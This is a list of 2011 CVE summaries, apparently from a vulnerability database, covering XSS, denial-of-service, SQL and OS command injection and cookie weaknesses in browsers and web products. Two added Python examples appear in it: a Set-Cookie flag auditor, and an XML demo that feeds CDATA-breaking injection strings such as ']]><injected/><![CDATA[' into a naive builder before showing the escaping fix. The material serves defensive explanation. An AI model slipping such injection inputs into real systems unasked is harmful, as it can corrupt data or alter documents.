[CVE-2011-2798] Google Chrome before 13.0.782.107 does not properly restrict access to internal schemes, which allows remote attackers to have an unspecified impact via a crafted web site.
[CVE-2011-2795] Google Chrome before 13.0.782.107 does not prevent calls to functions in other frames, which allows remote attackers to bypass intended access restrictions via a crafted web site, related to a "cross-frame function leak."
[CVE-2011-2786] Google Chrome before 13.0.782.107 does not ensure that the speech-input bubble is shown on the product's screen, which might make it easier for remote attackers to make audio recordings via a crafted web page containing an INPUT element.
[CVE-2011-2771] Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) URI attributes and (2) the External Feed component, as demonstrated by the guid element in an RSS feed.
[CVE-2011-2770] Cross-site scripting (XSS) vulnerability in man2html.cgi.c in man2html 1.6, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to error messages.
[CVE-2011-2761] Google Chrome 14.0.794.0 does not properly handle a reload of a page generated in response to a POST, which allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web site, related to GetWidget methods.
[CVE-2011-2759] The login page of IDSWebApp in the Web Administration Tool in IBM Tivoli Directory Server (TDS) 6.2 before 6.2.0.3-TIV-ITDS-IF0004 does not have an off autocomplete attribute for authentication fields, which makes it easier for remote attackers to obtain access by leveraging an unattended workstation.
[CVE-2011-2758] IDSWebApp in the Web Administration Tool in IBM Tivoli Directory Server (TDS) 6.2 before 6.2.0.3-TIV-ITDS-IF0004 does not require authentication for access to LDAP Server log files, which allows remote attackers to obtain sensitive information via a crafted URL.
[CVE-2011-2754] Cross-site scripting (XSS) vulnerability in the PageBuilder2 (aka Page Builder) theme in IBM WebSphere Portal 7.x before 7.0.0.1 CF006, as used in IBM Web Content Manager (WCM) and other products, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2743] Multiple cross-site scripting (XSS) vulnerabilities in Chyrp 2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the action parameter to (1) the default URI or (2) includes/javascript.php, or the (3) title or (4) body parameter to admin/help.php.
[CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2011-2711] Cross-site scripting (XSS) vulnerability in the print_fileinfo function in ui-diff.c in cgit 0.9.0.2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the filename associated with the rename hint.
[CVE-2011-2710] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to includes/application.php, reachable through index.php
[CVE-2011-2694] Cross-site scripting (XSS) vulnerability in the chg_passwd function in web/swat.c in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allows remote authenticated administrators to inject arbitrary web script or HTML via the username parameter to the passwd program (aka the user field to the Change Password page).
[CVE-2011-2682] The Login component in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 allows remote authenticated users to cause a denial of service (license consumption) by trying to log in to DOORS Web Access with a new user account that has never been used for a DOORS login.
[CVE-2011-2681] IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 does not properly handle exceptions, which has unspecified impact and remote attack vectors.
[CVE-2011-2680] Unspecified vulnerability in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 has unknown impact and remote attack vectors related to the "server error response."
[CVE-2011-2679] Cross-site scripting (XSS) vulnerability in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2675] Cross-site scripting (XSS) vulnerability in Enkai-kun before 110916 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2673] Cross-site scripting (XSS) vulnerability in BaserCMS before 1.6.13.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2672] Cross-site scripting (XSS) vulnerability in SemanticScuttle before 0.98 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2661] Multiple cross-site scripting (XSS) vulnerabilities in WebAccess in Novell GroupWise 8.0 before HP3 allow remote attackers to inject arbitrary web script or HTML via the (1) Directory.Item.name or (2) Directory.Item.displayName parameter.
[CVE-2011-2652] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via a crafted archive file list that is used in an overlay file.
[CVE-2011-2650] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via a crafted pattern name that is included in an RPM info display.
[CVE-2011-2644] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to an RPM info display.
[CVE-2011-2642] Multiple cross-site scripting (XSS) vulnerabilities in the table Print view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3 and 3.4.x before 3.4.3.2 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name.
[CVE-2011-2638] Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by games on zylom.com.
[CVE-2011-2637] Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by futura-sciences.com, seoptimise.com, and mitosyfraudes.org.
[CVE-2011-2636] Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by a certain Tomato Firmware page.
[CVE-2011-2632] Opera before 11.11 does not properly handle destruction of a Silverlight instance, which allows remote attackers to cause a denial of service (application crash) via a web page, as demonstrated by vod.onet.pl.
[CVE-2011-2631] The Cascading Style Sheets (CSS) implementation in Opera before 11.11 does not properly handle the column-count property, which allows remote attackers to cause a denial of service (infinite repaint loop and application hang) via a web page, as demonstrated by an unspecified Wikipedia page.
[CVE-2011-2630] Opera before 11.11 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page that is not properly handled during a reload occurring after the opening of a popup of the Easy Sticky Note extension.
[CVE-2011-2629] Unspecified vulnerability in Opera before 11.11 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by www.falk.de.
[CVE-2011-2627] Unspecified vulnerability in the DOM implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by live.com.
[CVE-2011-2622] Unspecified vulnerability in the Web Workers implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
[CVE-2011-2618] Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via web script that moves a (1) AUDIO element or (2) VIDEO element between windows.
[CVE-2011-2616] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (memory consumption) via unknown content on a web page, as demonstrated by test262.ecmascript.org.
[CVE-2011-2615] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application hang) via unknown content on a web page, as demonstrated by domiteca.com.
[CVE-2011-2612] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by progorod.ru.
[CVE-2011-2611] Unspecified vulnerability in the printing functionality in Opera before 11.50 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page.
[CVE-2011-2609] Opera before 11.50 does not properly restrict data: URIs, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site.
[CVE-2011-2607] Cross-site scripting (XSS) vulnerability in IBM Rational Team Concert (RTC) 3.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Work Item 165513.
[CVE-2011-2606] Cross-site scripting (XSS) vulnerability in the Web UI in IBM Rational Team Concert (RTC) 3.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Work Item 165511.
[CVE-2011-2604] The Intel G41 driver 6.14.10.5355 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK.
[CVE-2011-2603] The NVIDIA 9400M driver 6.2.6 on Mac OS X 10.6.7 allows remote attackers to cause a denial of service (desktop hang) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK.
[CVE-2011-2602] The NVIDIA Geforce 310 driver 6.14.12.7061 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK.
[CVE-2011-2601] The GPU support functionality in Mac OS X does not properly restrict rendering time, which allows remote attackers to cause a denial of service (desktop hang) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK.
[CVE-2011-2600] The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK.
[CVE-2011-2599] Google Chrome 11 does not block use of a cross-domain image as a WebGL texture, which allows remote attackers to obtain approximate copies of arbitrary images via a timing attack involving a crafted WebGL fragment shader.
[CVE-2011-2598] The WebGL implementation in Mozilla Firefox 4.x allows remote attackers to obtain screenshots of the windows of arbitrary desktop applications via vectors involving an SVG filter, an IFRAME element, and uninitialized data in graphics memory.
[CVE-2011-2578] Memory leak in Cisco IOS 15.1 and 15.2 allows remote attackers to cause a denial of service (memory consumption) via malformed SIP packets on a NAT interface, aka Bug ID CSCts12366.
[CVE-2011-2545] Cross-site scripting (XSS) vulnerability in the SIP implementation on the Cisco SPA8000 and SPA8800 before 6.1.11, SPA2102 and SPA3102 before 5.2.13, and SPA 500 series IP phones before 7.4.9 allows remote attackers to inject arbitrary web script or HTML via the FROM field of an INVITE message, aka Bug IDs CSCtr27277, CSCtr27256, CSCtr27274, and CSCtr14715.
[CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
[CVE-2011-2522] Multiple cross-site request forgery (CSRF) vulnerabilities in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allow remote attackers to hijack the authentication of administrators for requests that (1) shut down daemons, (2) start daemons, (3) add shares, (4) remove shares, (5) add printers, (6) remove printers, (7) add user accounts, or (8) remove user accounts, as demonstrated by certain start, stop, and restart parameters to the status program.
[CVE-2011-2510] Cross-site scripting (XSS) vulnerability in the RSS embedding feature in DokuWiki before 2011-05-25a Rincewind allows remote attackers to inject arbitrary web script or HTML via a link.
[CVE-2011-2509] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.6.4 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the com_contact component, as demonstrated by the Itemid parameter to index.php
[CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
[CVE-2011-2477] Multiple cross-site scripting (XSS) vulnerabilities in config.c in config.cgi in Icinga before 1.4.1, when escape_html_tags is disabled, allow remote attackers to inject arbitrary web script or HTML via a JavaScript expression, as demonstrated by the onload attribute of a BODY element located after a check-host-alive! sequence, a different vulnerability than CVE-2011-2179.
[CVE-2011-2476] Cross-site scripting (XSS) vulnerability in Coppermine Photo Gallery (CPG) before 1.5.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-4667.
[CVE-2011-2470] Cross-site scripting (XSS) vulnerability in chat/base/admin/login.php in A Really Simple Chat (ARSC) 3.3-rc2 allows remote attackers to inject arbitrary web script or HTML via the arsc_message parameter.
[CVE-2011-2463] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving the cfform tag.
[CVE-2011-2461] Cross-site scripting (XSS) vulnerability in the Adobe Flex SDK 3.x and 4.x before 4.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the loading of modules from different domains.
[CVE-2011-2458] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, when Internet Explorer is used, allows remote attackers to bypass the cross-domain policy via a crafted web site.
[CVE-2011-2444] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a "universal cross-site scripting issue," as exploited in the wild in September 2011.
[CVE-2011-2410] Cross-site scripting (XSS) vulnerability in HP OpenView Performance Insight 5.3, 5.31, 5.4, 5.41, 5.41.001, and 5.41.002 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2409] Cross-site scripting (XSS) vulnerability in the Calendar application in HP Palm webOS 3.x before 3.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2408] Cross-site scripting (XSS) vulnerability in the Contacts application in HP Palm webOS 3.x before 3.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2406] Cross-site scripting (XSS) vulnerability in HP OpenView Performance Insight 5.3, 5.31, 5.4, 5.41, 5.41.001, and 5.41.002 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2402] Cross-site scripting (XSS) vulnerability in HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, and 9.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2401] Session fixation vulnerability in HP SiteScope 9.x, 10.x, and 11.x allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2011-2400] Cross-site scripting (XSS) vulnerability in HP SiteScope 9.x, 10.x, and 11.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2385] The iPhoneHandle package 0.9.x before 0.9.7 and 1.0.x before 1.0.3 in Open Ticket Request System (OTRS) does not properly restrict use of the iPhoneHandle interface, which allows remote authenticated users to gain privileges, and consequently read or modify OTRS core objects, via unspecified vectors.
[CVE-2011-2379] Cross-site scripting (XSS) vulnerability in Bugzilla 2.4 through 2.22.7, 3.0.x through 3.3.x, 3.4.x before 3.4.12, 3.5.x, 3.6.x before 3.6.6, 3.7.x, 4.0.x before 4.0.2, and 4.1.x before 4.1.3, when Internet Explorer before 9 or Safari before 5.0.6 is used for Raw Unified mode, allows remote attackers to inject arbitrary web script or HTML via a crafted patch, related to content sniffing.
[CVE-2011-2372] Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not prevent the starting of a download in response to the holding of the Enter key, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site.
[CVE-2011-2369] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 4.x through 4.0.1 allows remote attackers to inject arbitrary web script or HTML via an SVG element containing an HTML-encoded entity.
[CVE-2011-2368] The WebGL implementation in Mozilla Firefox 4.x through 4.0.1 does not properly restrict write operations, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors.
[CVE-2011-2367] The WebGL implementation in Mozilla Firefox 4.x through 4.0.1 does not properly restrict read operations, which allows remote attackers to obtain sensitive information from GPU memory associated with an arbitrary process, or cause a denial of service (application crash), via unspecified vectors.
[CVE-2011-2366] Mozilla Gecko before 5.0, as used in Firefox before 5.0 and Thunderbird before 5.0, does not block use of a cross-domain image as a WebGL texture, which allows remote attackers to obtain approximate copies of arbitrary images via a timing attack involving a crafted WebGL fragment shader.
[CVE-2011-2362] Mozilla Firefox before 3.6.18, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 do not distinguish between cookies for two domain names that differ only in a trailing dot, which allows remote web servers to bypass the Same Origin Policy via Set-Cookie headers.
[CVE-2011-2361] The Basic Authentication dialog implementation in Google Chrome before 13.0.782.107 does not properly handle strings, which might make it easier for remote attackers to capture credentials via a crafted web site.
[CVE-2011-2360] Google Chrome before 13.0.782.107 does not ensure that the user is prompted before download of a dangerous file, which makes it easier for remote attackers to bypass intended content restrictions via a crafted web site.
[CVE-2011-2356] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2354] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2352] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2344] Android Picasa in Android 3.0 and 2.x through 2.3.4 uses a cleartext HTTP session when transmitting the authToken obtained from ClientLogin, which allows remote attackers to gain privileges and access private pictures and web albums by sniffing the token from connections with picasaweb.google.com.
[CVE-2011-2341] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2339] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2338] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1.
[CVE-2011-2320] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows remote attackers to affect confidentiality via unknown vectors related to Web Services.
[CVE-2011-2319] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows remote attackers to affect confidentiality, related to JMS.
[CVE-2011-2318] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows local users to affect confidentiality, related to WLS Security.
[CVE-2011-2297] Unspecified vulnerability in Oracle Solaris Cluster 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Data Service for WebLogic Server.
[CVE-2011-2255] Unspecified vulnerability in the Oracle WebLogic Portal component in Oracle Fusion Middleware 9.2.3.0, 10.0.1.0, 10.2.1.0, and 10.3.2.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2011-2237] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 10.1.3.5.0 and 10.1.3.5.1 allows remote authenticated users to affect integrity, related to WSM Console.
[CVE-2011-2227] Cross-site scripting (XSS) vulnerability in Novell Identity Manager (aka IDM) User Application 3.5.0, 3.5.1, 3.6.0, 3.6.1, 3.7.0, and 4.0.0, and Identity Manager Roles Based Provisioning Module 3.6.0, 3.6.1, 3.7.0, and 4.0.0, allows remote attackers to inject arbitrary web script or HTML via the apwaDetail (aka apwaDetailId) parameter, aka Bug 709603.
[CVE-2011-2226] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a pattern listing.
[CVE-2011-2222] Session fixation vulnerability in WebAdmin in the Mobility Pack before 1.2 in Novell Data Synchronizer 1.x through 1.1.2 build 428 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2011-2221] The Mobility Pack before 1.2 in Novell Data Synchronizer 1.x through 1.1.2 build 428 allows remote attackers to bypass WebAdmin authentication and obtain sensitive GroupWise information via unspecified vectors.
[CVE-2011-2180] Cross-site scripting (XSS) vulnerability in dereferer.php in A Really Simple Chat (ARSC) 3.3-rc2 allows remote attackers to inject arbitrary web script or HTML via the arsc_link parameter.
[CVE-2011-2179] Multiple cross-site scripting (XSS) vulnerabilities in config.c in config.cgi in (1) Nagios 3.2.3 and (2) Icinga before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the expand parameter, as demonstrated by an (a) command action or a (b) hosts action.
[CVE-2011-2173] The implementation of OutputMediator objects in IBM WebSphere Portal 6.0.1.7, and 7.0.0.1 before CF002, allows remote authenticated users to cause a denial of service (memory consumption) via requests.
[CVE-2011-2172] Cross-site scripting (XSS) vulnerability in the search center in IBM WebSphere Portal 7.0.0.1 before CF004 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2159] The SmarterTools SmarterStats 6.0 web server omits the Content-Type header for certain resources, which might allow remote attackers to have an unspecified impact by leveraging an interpretation conflict involving (1) Admin/Defaults/frmDefaultSiteSettings.aspx, (2) Admin/Defaults/frmServerDefaults.aspx, (3) Admin/frmReportSettings.aspx, (4) Admin/frmSite.aspx, (5) App_Themes/Default/ButtonBarIcons.xml, (6) App_Themes/Default/Skin.xml, (7) Client/frmImportSettings.aspx, (8) Client/frmSeoSettings.aspx, (9) Services/Web.config, (10) aspnet_client/system_web/4_0_30319/, (11) clientaccesspolicy.xml, (12) cloudscan.exe, (13) crossdomain.xml, or (14) sitemap.xml. NOTE: it is possible that only clients, not the SmarterStats product, could be affected by this issue.
[CVE-2011-2158] The SmarterTools SmarterStats 6.0 web server sends incorrect Content-Type headers for certain resources, which might allow remote attackers to have an unspecified impact by leveraging an interpretation conflict involving (1) Admin/frmSite.aspx, (2) Admin/frmSites.aspx, (3) Admin/frmViewReports.aspx, (4) App_Themes/AboutThisFolder.txt, (5) Client/frmViewReports.aspx, (6) Temp/AboutThisFolder.txt, (7) default.aspx, (8) login.aspx, or (9) certain .jpg URIs under Temp/. NOTE: it is possible that only clients, not the SmarterStats product, could be affected by this issue.
[CVE-2011-2157] The (1) Admin/frmEmailReportSettings.aspx and (2) Admin/frmGeneralSettings.aspx components in the SmarterTools SmarterStats 6.0 web server generate web pages containing e-mail addresses, which allows remote attackers to obtain potentially sensitive information by reading the default values of form fields.
[CVE-2011-2156] The SmarterTools SmarterStats 6.0 web server allows remote attackers to obtain directory listings via a direct request for the (1) Admin/, (2) Admin/Defaults/, (3) Admin/GettingStarted/, (4) Admin/Popups/, (5) App_Themes/, (6) Client/, (7) Client/Popups/, (8) Services/, (9) Temp/, (10) UserControls/, (11) UserControls/PanelBarTemplates/, (12) UserControls/Popups/, (13) aspnet_client/, or (14) aspnet_client/system_web/ directory name, or (15) certain directory names under App_Themes/Default/.
[CVE-2011-2155] Login.aspx in the SmarterTools SmarterStats 6.0 web server generates a ctl00$MPH$txtPassword password form field without disabling the autocomplete feature, which makes it easier for remote attackers to bypass authentication by leveraging an unattended workstation.
[CVE-2011-2154] login.aspx in the SmarterTools SmarterStats 6.0 web server does not include the HTTPOnly flag in a Set-Cookie header for the loginsettings cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie.
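The check a tester would run for the CVE-2011-2154 class of finding, as an added example (not code from the vulscan database or from SmarterStats): parse each Set-Cookie header a response sends and report cookies that lack HttpOnly, Secure or SameSite. The header values in SAMPLE_HEADERS are constructed for the example; only the cookie name loginsettings comes from the entry above.

```python
# Added example (not from the vulscan database or SmarterStats): audit Set-Cookie headers
# for the flags whose absence CVE-2011-2154 describes. Header values below are constructed.

def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (cookie name, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()   # attribute names are case-insensitive
    return name, attrs


def audit_set_cookie(headers, served_over_tls=True):
    """Return (cookie name, problem) pairs for every cookie missing a protective flag."""
    findings = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:          # script access via document.cookie stays possible
            findings.append((name, "missing HttpOnly"))
        if served_over_tls and "secure" not in attrs:
            findings.append((name, "missing Secure"))
        if "samesite" not in attrs:
            findings.append((name, "missing SameSite"))
    return findings


# Constructed sample: the first header imitates the weak pattern described for the
# loginsettings cookie (the value is invented); the second is what a hardened response sends.
SAMPLE_HEADERS = [
    "loginsettings=user%3Dadmin; path=/",
    "ASP.NET_SessionId=abc123; path=/; HttpOnly; Secure; SameSite=Lax",
]

if __name__ == "__main__":
    for cookie, problem in audit_set_cookie(SAMPLE_HEADERS):
        print(f"{cookie}: {problem}")
```

Feed it the Set-Cookie lines captured from a real login response (one list entry per header) to get the same report for a target.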
[CVE-2011-2153] Login.aspx in the SmarterTools SmarterStats 6.0 web server supports URLs containing txtUser and txtPass parameters in the query string, which makes it easier for context-dependent attackers to discover credentials by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history, related to a "cross-domain Referer leakage" issue.
[CVE-2011-2152] The SmarterTools SmarterStats 6.0 web server generates web pages containing external links in response to GET requests with query strings for (1) Client/frmViewReports.aspx or (2) UserControls/Popups/frmHelp.aspx, which makes it easier for remote attackers to obtain sensitive information by reading (a) web-server access logs or (b) web-server Referer logs, related to a "cross-domain Referer leakage" issue.
[CVE-2011-2151] The (1) Admin/frmEmailReportSettings.aspx, (2) Admin/frmGeneralSettings.aspx, (3) Admin/frmSite.aspx, (4) Client/frmUser.aspx, and (5) Login.aspx components in the SmarterTools SmarterStats 6.0 web server accept cleartext passwords, which makes it easier for remote attackers to obtain sensitive information by sniffing the network.
[CVE-2011-2150] The SmarterTools SmarterStats 6.0 web server does not properly validate string data that is intended for storage in an XML document, which allows remote attackers to cause a denial of service (parsing error and daemon pause) via vectors involving (1) certain cookies in a SiteInfoLookup action to Admin/frmSites.aspx, or certain (2) cookies or (3) parameters to (a) Client/frmViewOverviewReport.aspx, (b) Client/frmViewReports.aspx, or (c) Services/SiteAdmin.asmx, as demonstrated by a ]]>> string, related to an "XML injection" issue.
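Why a "]]>" string breaks a document built the way CVE-2011-2150 describes, as an added example (not code from the vulscan database or from SmarterStats): the vulnerable pattern splices untrusted text into a CDATA section by string concatenation, so the first "]]>" ends the section early; a stray "]]>" left in character data is a parse error (the daemon-pause case), and a payload that reopens CDATA smuggles a new element into the document. The element names are invented for the example; the library-based builder escapes the text instead.

```python
# Added example (not from the vulscan database or SmarterStats): CDATA splicing versus an
# escaping serializer, demonstrated with the "]]>" string named in CVE-2011-2150.
import xml.etree.ElementTree as ET


def naive_cdata_document(value):
    """Vulnerable pattern: wrap untrusted input in CDATA by string concatenation."""
    return "<site><name><![CDATA[" + value + "]]></name></site>"


def safe_document(value):
    """Build the same document through the XML library, which escapes '<', '>' and '&'."""
    root = ET.Element("site")
    ET.SubElement(root, "name").text = value
    return ET.tostring(root, encoding="unicode")


def parse_outcome(document):
    """Return ("ok", root element) or ("error", parser message)."""
    try:
        return "ok", ET.fromstring(document)
    except ET.ParseError as exc:
        return "error", str(exc)


if __name__ == "__main__":
    # "]]>>" closes the CDATA section early; the "]]>" that follows is illegal in
    # character data, so the parser rejects the whole document.
    print(parse_outcome(naive_cdata_document("]]>>")))
    # Closing CDATA and reopening it smuggles an element into the document.
    status, root = parse_outcome(naive_cdata_document("]]><injected/><![CDATA["))
    print(status, root.find("name/injected") is not None)
    # The escaping serializer stores both strings as plain text.
    print(safe_document("]]>>"))
```

The fix the example points at is the second builder: never assemble XML from untrusted strings, let the serializer escape text nodes, and treat any "]]>" that reaches a CDATA writer as data to encode, not markup.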
[CVE-2011-2149] Multiple SQL injection vulnerabilities in the SmarterTools SmarterStats 6.0 web server allow remote attackers to execute arbitrary SQL commands via certain parameters to (1) Admin/frmSite.aspx, (2) Default.aspx, (3) Services/SiteAdmin.asmx, or (4) Client/frmViewReports.aspx.
[CVE-2011-2148] Admin/frmSite.aspx in the SmarterTools SmarterStats 6.0 web server allows remote attackers to execute arbitrary commands via vectors involving a leading and trailing & (ampersand) character, and (1) an STTTState cookie, (2) the ctl00%24MPH%24txtAdminNewPassword_SettingText parameter, (3) the ctl00%24MPH%24txtSmarterLogDirectory parameter, (4) the ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter, (5) the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter, or (6) the ctl00_MPH_grdLogLocations_HiddenLSR parameter, related to an "OS command injection" issue.
[CVE-2011-2142] The Web Client Service in IBM Datacap Taskmaster Capture 8.0.1 before FP1 requires a cleartext password, which has unspecified impact and attack vectors.
[CVE-2011-2141] SQL injection vulnerability in TMWeb in IBM Datacap Taskmaster Capture 8.0.1 before FP1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2011-2133] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 8 and 9 before 9.0.1.262, and RoboHelp Server 8 and 9, allows remote attackers to inject arbitrary web script or HTML via the URI, related to template_stock/whutils.js.
